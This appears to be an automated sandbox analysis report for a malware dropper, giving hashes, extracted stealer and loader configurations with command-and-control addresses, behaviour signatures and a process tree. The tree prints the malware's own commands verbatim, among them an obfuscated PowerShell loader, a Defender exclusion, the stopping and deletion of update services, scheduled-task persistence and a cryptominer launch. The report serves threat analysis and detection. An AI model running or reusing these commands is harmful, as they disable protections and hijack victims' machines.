Resubmissions
11-02-2024 08:10
240211-j212ragb47 1011-02-2024 08:09
240211-j2kprseb2w 1009-02-2024 18:28
240209-w4c4xsde9t 1002-02-2024 12:52
240202-p4dxwsgfej 1002-02-2024 12:45
240202-pzapnsgdbp 1016-01-2024 15:29
240116-sw8dbaehh3 1010-01-2024 14:41
240110-r2wq2ahchl 1010-01-2024 13:29
240110-qrqatshbg3 1022-12-2023 08:48
231222-kqp1sadghq 10Analysis
-
max time kernel
104s -
max time network
102s -
platform
windows10-1703_x64 -
resource
win10-20231220-en -
resource tags
-
submitted
09-02-2024 18:28
Errors
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
lumma
185.99.133.246
Extracted
smokeloader
pub2
Extracted
smokeloader
2022
http://vatra.at/tmp/
http://spbdg.ru/tmp/
http://skinndia.com/tmp/
http://cracker.biz/tmp/
http://piratia-life.ru/tmp/
http://piratia.su/tmp/
Extracted
risepro
193.233.132.62
Extracted
redline
vic
91.92.241.115:12393
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Lumma Stealer payload V2 1 IoCs
-
Detect Lumma Stealer payload V4 1 IoCs
-
Detect ZGRat V1 6 IoCs
-
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
-
Modifies security service 2 TTPs 5 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
-
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
-
ZGRat
ZGRat is remote access trojan written in C#.
-
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 15 IoCs
-
Loads dropped DLL 3 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 8 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
-
Suspicious use of SetThreadContext 8 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 11 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 64 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 644 -s 39122⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{9c4a676d-1585-43bc-bef4-348fd88bcbc0}2⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{cecbf5ca-5b11-4d4d-9963-43c2df7ebbf4}2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 588 -s 9242⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 708 -s 4084⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe xtrjicqmdliu3⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"4⤵
- Drops file in Program Files directory
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor4⤵
- Detects videocard installed
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\jopacrypt.exe"C:\Users\Admin\AppData\Local\Temp\Files\jopacrypt.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup9.exe"C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup9.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\nsd829F.tmpC:\Users\Admin\AppData\Local\Temp\nsd829F.tmp4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\dmi1dfg7n.exe"C:\Users\Admin\AppData\Local\Temp\Files\dmi1dfg7n.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f5⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }4⤵
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC5⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\Files\75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe"C:\Users\Admin\AppData\Local\Temp\Files\75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\Files\plaza.exe"C:\Users\Admin\AppData\Local\Temp\Files\plaza.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Files\v2.exe"C:\Users\Admin\AppData\Local\Temp\Files\v2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Files\Setup.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\Setup.exe"4⤵
-
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAC7C.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"7⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl6⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe"C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe"3⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1696 -s 10282⤵
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5104 -s 7242⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵
-
\??\c:\windows\system32\sihost.exesihost.exe2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
